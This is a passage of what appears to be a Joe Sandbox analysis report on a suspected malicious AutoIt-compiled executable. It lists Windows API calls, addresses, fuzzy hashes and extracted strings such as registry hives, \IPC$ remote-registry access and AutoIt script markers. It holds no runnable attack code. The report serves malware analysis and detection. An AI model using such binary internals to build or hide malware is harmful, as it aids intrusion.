                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1212759294-1154884017
                                                                            • Opcode ID: fd89b67c4b5f8dcd75ca4f24ddb924e01e5c771f5d7af8575f8572fc4a356d5f
                                                                            • Instruction ID: 622ccecfa83ed4bd18f56b07353358b5d3f7b89d0ce6e7a7f788920165ec6581
                                                                            • Opcode Fuzzy Hash: fd89b67c4b5f8dcd75ca4f24ddb924e01e5c771f5d7af8575f8572fc4a356d5f
                                                                            • Instruction Fuzzy Hash: 8D61E371540229BAEB14EF68DC41FBE7BACFF08721F108115FA15D61D2EB74A990DBA0
                                                                            APIs
                                                                              • Part of subcall function 00801B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00802036,?,00000000,?,?,?,?,008016CB,00000000,?), ref: 00801B9A
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008020D3
                                                                            • KillTimer.USER32(-00000001,?,?,?,?,008016CB,00000000,?,?,00801AE2,?,?), ref: 0080216E
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0083BCA6
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008016CB,00000000,?,?,00801AE2,?,?), ref: 0083BCD7
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008016CB,00000000,?,?,00801AE2,?,?), ref: 0083BCEE
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008016CB,00000000,?,?,00801AE2,?,?), ref: 0083BD0A
                                                                            • DeleteObject.GDI32(00000000), ref: 0083BD1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID: S
                                                                            • API String ID: 641708696-2858979982
                                                                            • Opcode ID: cfdde857ff99f7778e480b22f8b72580c43dfe5890cc4e8f9d4ab15317964d11
                                                                            • Instruction ID: e7eab0f31d1100de763a35346fa0264e8146c8c00729d557c309543d5e5c0a87
                                                                            • Opcode Fuzzy Hash: cfdde857ff99f7778e480b22f8b72580c43dfe5890cc4e8f9d4ab15317964d11
                                                                            • Instruction Fuzzy Hash: B5617531110B00DFDB75AF18DD4CB2AB7F2FB80316F508529E642CA9A1C7B4B891DB91
                                                                            APIs
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0086A3CB
                                                                            • GetDriveTypeW.KERNEL32 ref: 0086A418
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A460
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A497
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A4C5
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 2698844021-4113822522
                                                                            • Opcode ID: 3644b13f75b1ddaad931b07d6011c0494f34ff465f25879290f5e1c38318641c
                                                                            • Instruction ID: 0a5d1d51ba26ef77f11b9b3a9f0b140dc291dbea7e4f8f4b5e39c48fd2c1e2c1
                                                                            • Opcode Fuzzy Hash: 3644b13f75b1ddaad931b07d6011c0494f34ff465f25879290f5e1c38318641c
                                                                            • Instruction Fuzzy Hash: 7D512A715042059FC744EF14CC9196AB7E8FF94718F50886DF89AA73A2DB31AD09CF52
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0083E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0085F8DF
                                                                            • LoadStringW.USER32(00000000,?,0083E029,00000001), ref: 0085F8E8
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            • GetModuleHandleW.KERNEL32(00000000,008C5310,?,00000FFF,?,?,0083E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0085F90A
                                                                            • LoadStringW.USER32(00000000,?,0083E029,00000001), ref: 0085F90D
                                                                            • __swprintf.LIBCMT ref: 0085F95D
                                                                            • __swprintf.LIBCMT ref: 0085F96E
                                                                            • _wprintf.LIBCMT ref: 0085FA17
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0085FA2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: bd0891c39e9693e2a9fe9ea0374c34fa86e5c06ce65b29ffa02515d2ad273648
                                                                            • Instruction ID: d6c13dfff4fe4801833c8b3a751d9eede6e7d37079775a103adff85957709c1a
                                                                            • Opcode Fuzzy Hash: bd0891c39e9693e2a9fe9ea0374c34fa86e5c06ce65b29ffa02515d2ad273648
                                                                            • Instruction Fuzzy Hash: 84413C72800119AACF05FBE8DD96DEE7778FF14305F500065BA05F2192EA356F49CB62
                                                                            APIs
                                                                              • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                                            • GetSysColor.USER32(0000000F), ref: 008021D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID: S
                                                                            • API String ID: 259745315-2858979982
                                                                            • Opcode ID: 2c96a504c66d2f137a9f77688c74d661e56ed8829b5a151c75012343728e8f16
                                                                            • Instruction ID: e228c4ee9728979e75b223ab65a947b01103a9f04edbcbfb34dfb8606d3580f4
                                                                            • Opcode Fuzzy Hash: 2c96a504c66d2f137a9f77688c74d661e56ed8829b5a151c75012343728e8f16
                                                                            • Instruction Fuzzy Hash: 89418E35100140AADB619F6CDC8CBB97B66FB46321F244265FE65CA1E2C7718C82DB61
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00889207,?,?), ref: 0088BA56
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA6D
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA78
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA85
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0088BA8E
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA9D
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0088BAA6
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BAAD
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BABE
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00892CAC,?), ref: 0088BAD7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0088BAE7
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0088BB0B
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0088BB36
                                                                            • DeleteObject.GDI32(00000000), ref: 0088BB5E
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0088BB74
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: b03c89a5ac31746fe339aa1d7c9400a08140b55621943ce33c3a55c3f13962f2
                                                                            • Instruction ID: 76f18a920ec3ede86582493f449f9745b5fa1ece70f10eb2ef2ab41ea6252e83
                                                                            • Opcode Fuzzy Hash: b03c89a5ac31746fe339aa1d7c9400a08140b55621943ce33c3a55c3f13962f2
                                                                            • Instruction Fuzzy Hash: 43411A75601208EFDB21AF69DC88EAB7BB8FF89721F104069FA09D7261D7309D01DB60
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 0086DA10
                                                                            • _wcscat.LIBCMT ref: 0086DA28
                                                                            • _wcscat.LIBCMT ref: 0086DA3A
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086DA4F
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0086DA63
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0086DA7B
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0086DA95
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0086DAA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: d0d262c55a1bab323511d8ee273f0d978a4641f2506927b96dc2f33b22a16971
                                                                            • Instruction ID: 6deaf191bbdbae7557c5144fa7e4df1b96fb0fd04530c9c62c5f08ac286d6926
                                                                            • Opcode Fuzzy Hash: d0d262c55a1bab323511d8ee273f0d978a4641f2506927b96dc2f33b22a16971
                                                                            • Instruction Fuzzy Hash: 32818471A043459FCB64DF68C84596ABBE4FF89314F198C2EF889CB251D730D945CB52
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00886FA5
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00886FA8
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00886FCC
                                                                            • _memset.LIBCMT ref: 00886FDD
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00886FEF
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00887067
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID: S
                                                                            • API String ID: 830647256-2858979982
                                                                            • Opcode ID: 1aae85d4144ff0caaab470afeee9b85fac275c904ee780e0619bf9830990e211
                                                                            • Instruction ID: af0933d381ba72a9638a042d304cd30123acd194253aef2a26cfc5d4965f4ff1
                                                                            • Opcode Fuzzy Hash: 1aae85d4144ff0caaab470afeee9b85fac275c904ee780e0619bf9830990e211
                                                                            • Instruction Fuzzy Hash: 91615A75900208AFDB11DFA8CC85EEE77B8FB09710F244169FA14EB2A1D771AD45DB90
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0087738F
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0087739B
                                                                            • CreateCompatibleDC.GDI32(?), ref: 008773A7
                                                                            • SelectObject.GDI32(00000000,?), ref: 008773B4
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00877408
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00877444
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00877468
                                                                            • SelectObject.GDI32(00000006,?), ref: 00877470
                                                                            • DeleteObject.GDI32(?), ref: 00877479
                                                                            • DeleteDC.GDI32(00000006), ref: 00877480
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0087748B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: 044e1c649adf5263011746aa72867dc9f4ad3d8639deb61aa6a33f6a6849dedf
                                                                            • Instruction ID: 1b66339ff0af9e626e9adfe4608241ff4f7f6303a7260f8b5f5ae7a97cede2ea
                                                                            • Opcode Fuzzy Hash: 044e1c649adf5263011746aa72867dc9f4ad3d8639deb61aa6a33f6a6849dedf
                                                                            • Instruction Fuzzy Hash: AB513775904209EFCB14CFA8CC84EAEBBB9FF48310F148529FA5AE7211D731A940DB50
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0087FDAD,?,?), ref: 00880E31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: 8o$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-1524927920
                                                                            • Opcode ID: 9700791ea59849cb4db50f1931131832763ee49f85b09da164daf03962f97f84
                                                                            • Instruction ID: 8ded8458a9703bb7604ff7c0e9bb436a376cb8e98ad22b7215f7e2e10e160940
                                                                            • Opcode Fuzzy Hash: 9700791ea59849cb4db50f1931131832763ee49f85b09da164daf03962f97f84
                                                                            • Instruction Fuzzy Hash: 2741393150026A8BCF60EF54E895AEF3764FF11304F944464FEA69B292DB30A95ECF61
                                                                            APIs
                                                                              • Part of subcall function 00820957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00806B0C,?,00008000), ref: 00820973
                                                                              • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00806BAD
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00806CFA
                                                                              • Part of subcall function 0080586D: _wcscpy.LIBCMT ref: 008058A5
                                                                              • Part of subcall function 0082363D: _iswctype.LIBCMT ref: 00823645
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-1018226102
                                                                            • Opcode ID: 55b86ccbf68b442ae9533cf6d165f3b597526b1ffd6141534dadc6e35bbd73f8
                                                                            • Instruction ID: 5358cb425c65f57371f7f9d6850981d5f28b056ece200ca7a89461125b9997f9
                                                                            • Opcode Fuzzy Hash: 55b86ccbf68b442ae9533cf6d165f3b597526b1ffd6141534dadc6e35bbd73f8
                                                                            • Instruction Fuzzy Hash: B10266301083419FC764EF28C8819AFBBE5FF99314F10492DF996D72A2EA319959CB53
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00862D50
                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00862DDD
                                                                            • GetMenuItemCount.USER32(008C5890), ref: 00862E66
                                                                            • DeleteMenu.USER32(008C5890,00000005,00000000,000000F5,?,?), ref: 00862EF6
                                                                            • DeleteMenu.USER32(008C5890,00000004,00000000), ref: 00862EFE
                                                                            • DeleteMenu.USER32(008C5890,00000006,00000000), ref: 00862F06
                                                                            • DeleteMenu.USER32(008C5890,00000003,00000000), ref: 00862F0E
                                                                            • GetMenuItemCount.USER32(008C5890), ref: 00862F16
                                                                            • SetMenuItemInfoW.USER32(008C5890,00000004,00000000,00000030), ref: 00862F4C
                                                                            • GetCursorPos.USER32(?), ref: 00862F56
                                                                            • SetForegroundWindow.USER32(00000000), ref: 00862F5F
                                                                            • TrackPopupMenuEx.USER32(008C5890,00000000,?,00000000,00000000,00000000), ref: 00862F72
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00862F7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 3993528054-0
                                                                            • Opcode ID: 99d96e9f831c42f53e0dfa2af9ed66bc6d83a0635eb26bcae026287655b05ddd
                                                                            • Instruction ID: 83175465bd051a60077821cd9e9b72ab3e7808f1003496dccc09f25d31d14e88
                                                                            • Opcode Fuzzy Hash: 99d96e9f831c42f53e0dfa2af9ed66bc6d83a0635eb26bcae026287655b05ddd
                                                                            • Instruction Fuzzy Hash: 55710970601A09BFEB219F58DC49FAABF64FF04364F110266F615EA1E2C7726C60D791
                                                                            APIs
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            • _memset.LIBCMT ref: 0085786B
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008578A0
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008578BC
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008578D8
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00857902
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0085792A
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00857935
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0085793A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1411258926-22481851
                                                                            • Opcode ID: 18cf83912766e2b58841b49cb4eaf648d9776b19916fc20f3fee2656055e51ee
                                                                            • Instruction ID: da64e865793f63624ad14518dee65291d8a36a645fd578ae4a4a5f5597dc4918
                                                                            • Opcode Fuzzy Hash: 18cf83912766e2b58841b49cb4eaf648d9776b19916fc20f3fee2656055e51ee
                                                                            • Instruction Fuzzy Hash: 50410972C1462DAADF11EBA8EC45DEEB778FF14311F404069E915E32A1DB356D08CBA1
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0088716A
                                                                            • CreateMenu.USER32 ref: 00887185
                                                                            • SetMenu.USER32(?,00000000), ref: 00887194
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887221
                                                                            • IsMenu.USER32(?), ref: 00887237
                                                                            • CreatePopupMenu.USER32 ref: 00887241
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0088726E
                                                                            • DrawMenuBar.USER32 ref: 00887276
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
